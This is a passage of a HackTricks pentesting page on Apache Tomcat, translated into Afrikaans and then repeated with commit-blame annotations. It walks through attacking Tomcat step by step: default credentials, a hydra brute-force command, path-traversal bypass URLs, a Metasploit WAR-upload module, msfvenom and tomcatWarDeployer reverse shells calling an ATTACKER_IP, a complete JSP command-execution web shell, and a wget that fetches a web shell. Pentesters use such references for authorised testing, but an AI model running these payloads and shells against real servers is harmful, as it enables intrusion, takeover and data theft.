hacktricks/network-services-pentesting/pentesting-web/tomcat/README.md

# Tomcat

<details>

<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* Werk jy by 'n **cybersekerheidsmaatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
* Ontdek [**Die PEASS-familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**hacktricks-opslag**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud-opslag**](https://github.com/carlospolop/hacktricks-cloud).

</details>

**Try Hard Security Group**

<figure><img src="../../../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>

{% embed url="https://discord.gg/tryhardsecurity" %}

***

## Ontdekking

* Dit hardloop gewoonlik op **poort 8080**
* **Gewone Tomcat-fout:**

<figure><img src="../../../.gitbook/assets/image (147).png" alt=""><figcaption></figcaption></figure>

## Enumerasie

### **Weergawe-identifikasie**

Om die weergawe van Apache Tomcat te vind, kan 'n eenvoudige bevel uitgevoer word:
```bash
curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat
```
### **Bestuurslêers Ligging**

Die identifisering van die presiese ligging van die **`/bestuurder`** en **`/gasheer-bestuurder`** gids is noodsaaklik aangesien hul name verander kan word. 'n Brute-force soektog word aanbeveel om hierdie bladsye op te spoor.

### **Gebruikersnaam Opsomming**

Vir Tomcat weergawes ouer as 6, is dit moontlik om gebruikersname op te som deur:
```bash
msf> use auxiliary/scanner/http/tomcat_enum
```
### **Verstek Wagwoorde**

Die **`/manager/html`** gids is veral sensitief omdat dit die oplaai en implementering van WAR-lêers moontlik maak, wat tot kode-uitvoering kan lei. Hierdie gids word beskerm deur basiese HTTP-verifikasie, met algemene wagwoorde wat insluit:

* admin:admin
* tomcat:tomcat
* admin:
* admin:s3cr3t
* tomcat:s3cr3t
* admin:tomcat

Hierdie wagwoorde kan getoets word met behulp van:
```bash
msf> use auxiliary/scanner/http/tomcat_mgr_login
```
'n Ander opmerklike gids is **`/manager/status`**, wat die Tomcat- en OS-weergawe vertoon, wat help met die identifisering van kwesbaarhede.

### **Brute Force-aanval**

Om 'n brute force-aanval op die bestuursgids te probeer, kan mens gebruik:
```bash
hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html
```
## Algemene Kwesbaarhede

### **Wagwoord Terugsporing Blootstelling**

Toegang tot `/auth.jsp` kan die wagwoord in 'n terugsporing onthul onder gunstige omstandighede.

### **Dubbele URL-kodering**

Die kwesbaarheid CVE-2007-1860 in `mod_jk` maak dubbele URL-kodering padtraversal moontlik, wat ongemagtigde toegang tot die bestuurskoppelvlak via 'n spesiaal saamgestelde URL moontlik maak.

Om toegang te verkry tot die bestuursweb van die Tomcat, gaan na: `pathTomcat/%252E%252E/manager/html`

### /voorbeelde

Apache Tomcat weergawes 4.x tot 7.x sluit voorbeeldskripte in wat vatbaar is vir inligtingsblootstelling en kruisskripsaanvalle (XSS). Hierdie skripte, wat volledig gelys is, moet nagegaan word vir ongemagtigde toegang en potensiële uitbuiting. Vind [meer inligting hier](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/)

* /voorbeelde/jsp/num/numguess.jsp
* /voorbeelde/jsp/dates/date.jsp
* /voorbeelde/jsp/snp/snoop.jsp
* /voorbeelde/jsp/error/error.html
* /voorbeelde/jsp/sessions/carts.html
* /voorbeelde/jsp/checkbox/check.html
* /voorbeelde/jsp/colors/colors.html
* /voorbeelde/jsp/cal/login.html
* /voorbeelde/jsp/include/include.jsp
* /voorbeelde/jsp/forward/forward.jsp
* /voorbeelde/jsp/plugin/plugin.jsp
* /voorbeelde/jsp/jsptoserv/jsptoservlet.jsp
* /voorbeelde/jsp/simpletag/foo.jsp
* /voorbeelde/jsp/mail/sendmail.jsp
* /voorbeelde/servlet/HelloWorldExample
* /voorbeelde/servlet/RequestInfoExample
* /voorbeelde/servlet/RequestHeaderExample
* /voorbeelde/servlet/RequestParamExample
* /voorbeelde/servlet/CookieExample
* /voorbeelde/servlet/JndiServlet
* /voorbeelde/servlet/SessionExample
* /tomcat-docs/appdev/sample/web/hello.jsp

### **Padtraversal-uitbuiting**

In sommige [**kwesbare opsette van Tomcat**](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/) kan jy toegang tot beskermde gids in Tomcat verkry deur die pad: `/..;/`

Dus, byvoorbeeld, kan jy moontlik **die Tomcat-bestuurder**-bladsy toegang deur te gaan na: `www.vulnerable.com/lalala/..;/manager/html`

**'n Ander manier** om beskermde paaie te verby te gaan deur hierdie truuk te gebruik, is om toegang te verkry tot `http://www.vulnerable.com/;param=value/manager/html`

## RCE

Laastens, as jy toegang het tot die Tomcat-webtoepassingsbestuurder, kan jy **'n .war-lêer oplaai en ontplooi (kode uitvoer)**.

### Beperkings

Jy sal slegs 'n WAR kan ontplooi as jy **genoeg voorregte** het (rolle: **admin**, **bestuurder** en **bestuurder-skrips**). Hierdie besonderhede kan gevind word onder _tomcat-users.xml_ gewoonlik gedefinieer in `/usr/share/tomcat9/etc/tomcat-users.xml` (dit wissel tussen weergawes) (sien [POST](./#post) afdeling).
```bash
# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed

# deploy under "path" context path
curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell"

# undeploy
curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"
```
### Metasploit
```bash
use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
msf exploit(multi/http/tomcat_mgr_upload) > exploit
```
### MSFVenom Omgekeerde Skul

1. Skep die oorlog om te ontplooi:
```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war
```
2. Laai die `revshell.war` lêer op en kry toegang daartoe (`/revshell/`):

### Bind en omgekeerde dop met [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer)

In sommige scenarios werk dit nie (byvoorbeeld ou weergawes van sun)

#### Aflaai
```bash
git clone https://github.com/mgeeky/tomcatWarDeployer.git
```
#### Omgekeerde dopshell
```bash
./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/
```
#### Bind skul
```bash
./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/
```
### Gebruik [Culsterd](https://github.com/hatRiot/clusterd)
```bash
clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows
```
### Handmatige metode - Web shell

Skep **index.jsp** met hierdie [inhoud](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp):
```java
<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
}  catch(IOException e) {   e.printStackTrace();   }
}
%>
<pre><%=output %></pre>
```

```bash
mkdir webshell
cp index.jsp webshell
cd webshell
jar -cvf ../webshell.war *
webshell.war is created
# Upload it
```
### Handleiding Metode 2

Kry 'n JSP-webshell soos [hierdie](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp) en skep 'n WAR-lêer:
```bash
wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp
# When this file is uploaded to the manager GUI, the /backup application will be added to the table.
# Go to: http://tomcat-site.local:8180/backup/cmd.jsp
```
## POST

Naam van Tomcat-geloofsbriewe lêer is _tomcat-users.xml_
```bash
find / -name tomcat-users.xml 2>/dev/null
```
### Ander maniere om Tomcat-gedragskode te versamel:
```bash
msf> use post/multi/gather/tomcat_gather
msf> use post/windows/gather/enum_tomcat
```
## Ander tomcat skandering gereedskap

* [https://github.com/p0dalirius/ApacheTomcatScanner](https://github.com/p0dalirius/ApacheTomcatScanner)

## Verwysings

* [https://github.com/simran-sankhala/Pentest-Tomcat](https://github.com/simran-sankhala/Pentest-Tomcat)
* [https://hackertarget.com/sample/nexpose-metasploitable-test.pdf](https://hackertarget.com/sample/nexpose-metasploitable-test.pdf)

**Probeer Hard Security Group**

<figure><img src="../../../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>

{% embed url="https://discord.gg/tryhardsecurity" %}

<details>

<summary><strong>Leer AWS hakwerk vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* Werk jy in 'n **cybersecurity maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF**? Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Deel jou haktruuks deur PRs in te dien by die** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>
GitBook: No commit message 2024-04-06 18:08:38 +00:00			`# Tomcat`

			`<details>`

			`<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`

Translated ['network-services-pentesting/pentesting-web/tomcat/README.md 2024-04-11 00:57:33 +00:00			`* Werk jy by 'n cybersekerheidsmaatskappy? Wil jy jou maatskappy geadverteer sien in HackTricks? of wil jy toegang hê tot die nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat? Kyk na die [INSKRYWINGSPLANNE](https://github.com/sponsors/carlospolop)!`
GitBook: No commit message 2024-04-06 18:08:38 +00:00			`* Ontdek [Die PEASS-familie](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [NFT's](https://opensea.io/collection/the-peass-family)`
Translated ['network-services-pentesting/pentesting-web/tomcat/README.md 2024-04-11 00:57:33 +00:00			`* Kry die [amptelike PEASS & HackTricks swag](https://peass.creator-spring.com)`
GitBook: No commit message 2024-04-06 18:08:38 +00:00			`* Sluit aan by die [💬](https://emojipedia.org/speech-balloon/) [Discord-groep](https://discord.gg/hRep4RUj7f) of die [telegram-groep](https://t.me/peass) of volg my op Twitter 🐦[@carlospolopm](https://twitter.com/hacktricks\_live).`
			`* Deel jou haktruuks deur PR's in te dien by die [hacktricks-opslag](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-opslag](https://github.com/carlospolop/hacktricks-cloud).`

			`</details>`

			`Try Hard Security Group`

			`<figure><img src="../../../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>`

			`{% embed url="https://discord.gg/tryhardsecurity" %}`

			`***`

			`## Ontdekking`

			`* Dit hardloop gewoonlik op poort 8080`
			`* Gewone Tomcat-fout:`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 05:33:57 +00:00			`<figure><img src="../../../.gitbook/assets/image (147).png" alt=""><figcaption></figcaption></figure>`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
			`## Enumerasie`

Translated ['network-services-pentesting/pentesting-web/tomcat/README.md 2024-04-11 00:57:33 +00:00			`### Weergawe-identifikasie`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
			`Om die weergawe van Apache Tomcat te vind, kan 'n eenvoudige bevel uitgevoer word:`
			```bash
			`curl -s http://tomcat-site.local:8080/docs/ \| grep Tomcat`
			```
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 05:33:57 +00:00			`### Bestuurslêers Ligging`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 05:33:57 +00:00			Die identifisering van die presiese ligging van die `/bestuurder` en `/gasheer-bestuurder` gids is noodsaaklik aangesien hul name verander kan word. 'n Brute-force soektog word aanbeveel om hierdie bladsye op te spoor.
GitBook: No commit message 2024-04-06 18:08:38 +00:00
			`### Gebruikersnaam Opsomming`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 05:33:57 +00:00			`Vir Tomcat weergawes ouer as 6, is dit moontlik om gebruikersname op te som deur:`
GitBook: No commit message 2024-04-06 18:08:38 +00:00			```bash
			`msf> use auxiliary/scanner/http/tomcat_enum`
			```
			`### Verstek Wagwoorde`

Translated ['network-services-pentesting/pentesting-web/tomcat/README.md 2024-04-11 00:57:33 +00:00			Die `/manager/html` gids is veral sensitief omdat dit die oplaai en implementering van WAR-lêers moontlik maak, wat tot kode-uitvoering kan lei. Hierdie gids word beskerm deur basiese HTTP-verifikasie, met algemene wagwoorde wat insluit:
GitBook: No commit message 2024-04-06 18:08:38 +00:00
			`* admin:admin`
			`* tomcat:tomcat`
			`* admin:`
			`* admin:s3cr3t`
			`* tomcat:s3cr3t`
			`* admin:tomcat`

Translated ['network-services-pentesting/pentesting-web/tomcat/README.md 2024-04-11 00:57:33 +00:00			`Hierdie wagwoorde kan getoets word met behulp van:`
GitBook: No commit message 2024-04-06 18:08:38 +00:00			```bash
			`msf> use auxiliary/scanner/http/tomcat_mgr_login`
			```
Translated ['network-services-pentesting/pentesting-web/tomcat/README.md 2024-04-11 00:57:33 +00:00			'n Ander opmerklike gids is `/manager/status`, wat die Tomcat- en OS-weergawe vertoon, wat help met die identifisering van kwesbaarhede.
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['network-services-pentesting/pentesting-web/tomcat/README.md 2024-04-11 00:57:33 +00:00			`### Brute Force-aanval`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['network-services-pentesting/pentesting-web/tomcat/README.md 2024-04-11 00:57:33 +00:00			`Om 'n brute force-aanval op die bestuursgids te probeer, kan mens gebruik:`
GitBook: No commit message 2024-04-06 18:08:38 +00:00			```bash
			`hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html`
			```
			`## Algemene Kwesbaarhede`

Translated ['network-services-pentesting/pentesting-web/tomcat/README.md 2024-04-11 00:57:33 +00:00			`### Wagwoord Terugsporing Blootstelling`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
			Toegang tot `/auth.jsp` kan die wagwoord in 'n terugsporing onthul onder gunstige omstandighede.

			`### Dubbele URL-kodering`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 05:33:57 +00:00			Die kwesbaarheid CVE-2007-1860 in `mod_jk` maak dubbele URL-kodering padtraversal moontlik, wat ongemagtigde toegang tot die bestuurskoppelvlak via 'n spesiaal saamgestelde URL moontlik maak.
GitBook: No commit message 2024-04-06 18:08:38 +00:00
			Om toegang te verkry tot die bestuursweb van die Tomcat, gaan na: `pathTomcat/%252E%252E/manager/html`

			`### /voorbeelde`

Translated ['network-services-pentesting/pentesting-web/tomcat/README.md 2024-04-11 00:57:33 +00:00			`Apache Tomcat weergawes 4.x tot 7.x sluit voorbeeldskripte in wat vatbaar is vir inligtingsblootstelling en kruisskripsaanvalle (XSS). Hierdie skripte, wat volledig gelys is, moet nagegaan word vir ongemagtigde toegang en potensiële uitbuiting. Vind [meer inligting hier](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/)`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
			`* /voorbeelde/jsp/num/numguess.jsp`
			`* /voorbeelde/jsp/dates/date.jsp`
			`* /voorbeelde/jsp/snp/snoop.jsp`
			`* /voorbeelde/jsp/error/error.html`
			`* /voorbeelde/jsp/sessions/carts.html`
			`* /voorbeelde/jsp/checkbox/check.html`
			`* /voorbeelde/jsp/colors/colors.html`
			`* /voorbeelde/jsp/cal/login.html`
			`* /voorbeelde/jsp/include/include.jsp`
			`* /voorbeelde/jsp/forward/forward.jsp`
			`* /voorbeelde/jsp/plugin/plugin.jsp`
			`* /voorbeelde/jsp/jsptoserv/jsptoservlet.jsp`
			`* /voorbeelde/jsp/simpletag/foo.jsp`
			`* /voorbeelde/jsp/mail/sendmail.jsp`
			`* /voorbeelde/servlet/HelloWorldExample`
			`* /voorbeelde/servlet/RequestInfoExample`
			`* /voorbeelde/servlet/RequestHeaderExample`
			`* /voorbeelde/servlet/RequestParamExample`
			`* /voorbeelde/servlet/CookieExample`
			`* /voorbeelde/servlet/JndiServlet`
			`* /voorbeelde/servlet/SessionExample`
			`* /tomcat-docs/appdev/sample/web/hello.jsp`

			`### Padtraversal-uitbuiting`

Translated ['network-services-pentesting/pentesting-web/tomcat/README.md 2024-04-11 00:57:33 +00:00			In sommige [kwesbare opsette van Tomcat](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/) kan jy toegang tot beskermde gids in Tomcat verkry deur die pad: `/..;/`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['network-services-pentesting/pentesting-web/tomcat/README.md 2024-04-11 00:57:33 +00:00			Dus, byvoorbeeld, kan jy moontlik die Tomcat-bestuurder-bladsy toegang deur te gaan na: `www.vulnerable.com/lalala/..;/manager/html`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['network-services-pentesting/pentesting-web/tomcat/README.md 2024-04-11 00:57:33 +00:00			'n Ander manier om beskermde paaie te verby te gaan deur hierdie truuk te gebruik, is om toegang te verkry tot `http://www.vulnerable.com/;param=value/manager/html`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
			`## RCE`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 05:33:57 +00:00			`Laastens, as jy toegang het tot die Tomcat-webtoepassingsbestuurder, kan jy 'n .war-lêer oplaai en ontplooi (kode uitvoer).`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
			`### Beperkings`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 05:33:57 +00:00			Jy sal slegs 'n WAR kan ontplooi as jy genoeg voorregte het (rolle: admin, bestuurder en bestuurder-skrips). Hierdie besonderhede kan gevind word onder _tomcat-users.xml_ gewoonlik gedefinieer in `/usr/share/tomcat9/etc/tomcat-users.xml` (dit wissel tussen weergawes) (sien [POST](./#post) afdeling).
GitBook: No commit message 2024-04-06 18:08:38 +00:00			```bash
			`# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed`

			`# deploy under "path" context path`
			`curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell"`

			`# undeploy`
			`curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"`
			```
			`### Metasploit`
			```bash
			`use exploit/multi/http/tomcat_mgr_upload`
			`msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>`
			`msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>`
			`msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>`
			`msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>`
			`msf exploit(multi/http/tomcat_mgr_upload) > exploit`
			```
			`### MSFVenom Omgekeerde Skul`

			`1. Skep die oorlog om te ontplooi:`
			```bash
Translated ['network-services-pentesting/pentesting-web/tomcat/README.md 2024-04-11 00:57:33 +00:00			`msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war`
GitBook: No commit message 2024-04-06 18:08:38 +00:00			```
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 05:33:57 +00:00			2. Laai die `revshell.war` lêer op en kry toegang daartoe (`/revshell/`):
GitBook: No commit message 2024-04-06 18:08:38 +00:00
			`### Bind en omgekeerde dop met [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer)`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 05:33:57 +00:00			`In sommige scenarios werk dit nie (byvoorbeeld ou weergawes van sun)`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
			`#### Aflaai`
			```bash
			`git clone https://github.com/mgeeky/tomcatWarDeployer.git`
			```
Translated ['network-services-pentesting/pentesting-web/tomcat/README.md 2024-04-11 00:57:33 +00:00			`#### Omgekeerde dopshell`
GitBook: No commit message 2024-04-06 18:08:38 +00:00			```bash
			`./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/`
			```
			`#### Bind skul`
			```bash
			`./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/`
			```
			`### Gebruik [Culsterd](https://github.com/hatRiot/clusterd)`
			```bash
			`clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows`
			```
			`### Handmatige metode - Web shell`

			`Skep index.jsp met hierdie [inhoud](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp):`
			```java
			`<FORM METHOD=GET ACTION='index.jsp'>`
			`<INPUT name='cmd' type=text>`
			`<INPUT type=submit value='Run'>`
			`</FORM>`
			`<%@ page import="java.io.*" %>`
			`<%`
			`String cmd = request.getParameter("cmd");`
			`String output = "";`
			`if(cmd != null) {`
			`String s = null;`
			`try {`
			`Process p = Runtime.getRuntime().exec(cmd,null,null);`
			`BufferedReader sI = new BufferedReader(new`
			`InputStreamReader(p.getInputStream()));`
			`while((s = sI.readLine()) != null) { output += s+"</br>"; }`
			`} catch(IOException e) { e.printStackTrace(); }`
			`}`
			`%>`
			`<pre><%=output %></pre>`
			```

			```bash
			`mkdir webshell`
			`cp index.jsp webshell`
			`cd webshell`
			`jar -cvf ../webshell.war *`
			`webshell.war is created`
			`# Upload it`
			```
			`### Handleiding Metode 2`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 05:33:57 +00:00			`Kry 'n JSP-webshell soos [hierdie](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp) en skep 'n WAR-lêer:`
GitBook: No commit message 2024-04-06 18:08:38 +00:00			```bash
			`wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp`
			`zip -r backup.war cmd.jsp`
			`# When this file is uploaded to the manager GUI, the /backup application will be added to the table.`
			`# Go to: http://tomcat-site.local:8180/backup/cmd.jsp`
			```
			`## POST`

			`Naam van Tomcat-geloofsbriewe lêer is _tomcat-users.xml_`
			```bash
			`find / -name tomcat-users.xml 2>/dev/null`
			```
			`### Ander maniere om Tomcat-gedragskode te versamel:`
			```bash
			`msf> use post/multi/gather/tomcat_gather`
			`msf> use post/windows/gather/enum_tomcat`
			```
			`## Ander tomcat skandering gereedskap`

			`* [https://github.com/p0dalirius/ApacheTomcatScanner](https://github.com/p0dalirius/ApacheTomcatScanner)`

			`## Verwysings`

			`* [https://github.com/simran-sankhala/Pentest-Tomcat](https://github.com/simran-sankhala/Pentest-Tomcat)`
			`* [https://hackertarget.com/sample/nexpose-metasploitable-test.pdf](https://hackertarget.com/sample/nexpose-metasploitable-test.pdf)`

			`Probeer Hard Security Group`

			`<figure><img src="../../../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>`

			`{% embed url="https://discord.gg/tryhardsecurity" %}`

			`<details>`

Translated ['network-services-pentesting/pentesting-web/tomcat/README.md 2024-04-11 00:57:33 +00:00			`<summary><strong>Leer AWS hakwerk vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 05:33:57 +00:00			`* Werk jy in 'n cybersecurity maatskappy? Wil jy jou maatskappy geadverteer sien in HackTricks? of wil jy toegang hê tot die nuutste weergawe van die PEASS of HackTricks aflaai in PDF? Kyk na die [INSKRYWINGSPLANNE](https://github.com/sponsors/carlospolop)!`
GitBook: No commit message 2024-04-06 18:08:38 +00:00			`* Ontdek [Die PEASS Familie](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Kry die [amptelike PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Sluit aan by die [💬](https://emojipedia.org/speech-balloon/) [Discord groep](https://discord.gg/hRep4RUj7f) of die [telegram groep](https://t.me/peass) of volg my op Twitter 🐦[@carlospolopm](https://twitter.com/hacktricks\_live).`
Translated ['network-services-pentesting/pentesting-web/tomcat/README.md 2024-04-11 00:57:33 +00:00			`* Deel jou haktruuks deur PRs in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud).`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
			`</details>`